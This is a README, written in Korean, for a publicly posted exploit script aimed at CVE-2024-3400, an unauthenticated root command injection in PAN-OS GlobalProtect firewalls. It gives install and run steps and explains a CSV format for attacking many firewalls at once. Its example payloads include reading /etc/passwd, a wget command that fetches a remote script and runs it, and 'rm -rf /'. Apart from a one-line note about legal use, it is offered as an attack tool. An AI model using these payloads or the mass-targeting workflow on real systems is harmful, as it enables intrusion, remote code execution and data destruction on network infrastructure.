
# CVE-2024-3400 익스플로잇 스크립트 PAN-OS GlobalProtect의 명령 주입 취약점으로, 인증 없이 루트 권한으로 원격 코드 실행을 허용합니다. 단일 대상 및 CSV 기반 다중 대상 익스플로잇을 지원합니다.
이 스크립트는 PAN-OS 방화벽의 취약점 악용을 시연하기 위해 설계되었습니다. 방화벽의 API 엔드포인트에 특수하게 제작된 페이로드를 전송하여 임의의 명령을 실행합니다. 이 익스플로잇은 특정 PAN-OS 버전에서 Palo Alto Networks PAN-OS 소프트웨어의 GlobalProtect 기능에 존재하는 명령 주입 취약점인 CVE-2024-3400을 대상으로 합니다. 특정 기능 구성으로 인해 인증되지 않은 공격자가 방화벽에서 루트 권한으로 임의의 코드를 실행할 수 있습니다.
참고: 이 스크립트는 법적 및 윤리적 목적으로만, 그리고 테스트 권한이 있는 시스템에서만 사용하시기 바랍니다.
이 프로젝트를 사용하려면 다음 단계를 따르세요:
git clone https://github.com/Yuvvi01/CVE-2024-3400
cd CVE-2024-3400
pip install -r requirements.txt
python3 exploit.py
프롬프트에 따라 취약한 PAN-OS 방화벽의 IP 주소와 실행할 페이로드를 입력합니다.
ls -la
cat /etc/passwd
whoami
wget http://example.com/malicious_script.sh -O /tmp/malicious_script.sh && chmod +x /tmp/malicious_script.sh && /tmp/malicious_script.sh
rm -rf /
스크립트는 PAN-OS 방화벽 서버의 SSL 인증서 파일 경로를 요청합니다. 경로를 입력하지 않으면 스크립트는 SSL 검증을 자동으로 false로 설정하여 SSL을 사실상 비활성화합니다.
이 스크립트를 사용하면 CSV 파일을 통해 취약한 PAN-OS 방화벽의 여러 대상을 공격할 수 있습니다. CSV 파일을 올바르게 구성하는 방법은 다음과 같습니다:
CSV 파일에는 세 개의 열이 있어야 합니다:
ipaddress: 취약한 PAN-OS 방화벽의 IP 주소. payload: 방화벽에서 실행할 페이로드. path/to/root_CA_certificate.pem: 루트 CA 인증서의 경로(인증서 검증이 비활성화된 경우 비워 둡니다).
ipaddress,payload,path/to/root_CA_certificate.pem
192.168.1.1,exploit_payload1,/path/to/certificate.pem
192.168.1.2,exploit_payload2,
지정된 형식으로 CSV 파일을 만듭니다. IP 주소, 페이로드, 루트 CA 인증서 경로(해당하는 경우)를 입력합니다. 루트 CA 인증서에 유효한 경로를 제공하거나, 인증서 검증이 비활성화된 경우 해당 필드를 비워 둡니다. 스크립트를 실행하고 프롬프트가 표시되면 CSV 파일을 사용하는 옵션을 선택합니다.